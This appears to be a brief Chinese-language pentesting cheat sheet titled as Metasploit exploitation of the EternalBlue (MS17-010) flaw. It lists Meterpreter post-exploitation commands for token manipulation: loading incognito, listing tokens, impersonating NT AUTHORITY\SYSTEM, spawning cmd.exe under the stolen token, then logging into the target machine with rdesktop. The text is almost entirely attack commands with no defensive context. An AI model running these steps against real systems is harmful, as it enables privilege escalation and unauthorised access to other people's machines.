MSF - 永恒之蓝ms17漏洞利用
令牌操纵
use incognito #heip incognito 查看帮助
list_tokens -u 查看可用的token
impersonate_token “伪造的身份” #假冒token 或者
举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用\
execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell
登陆靶机电脑
1 rdesktop -u 用户名 -p 密码 登陆ip地址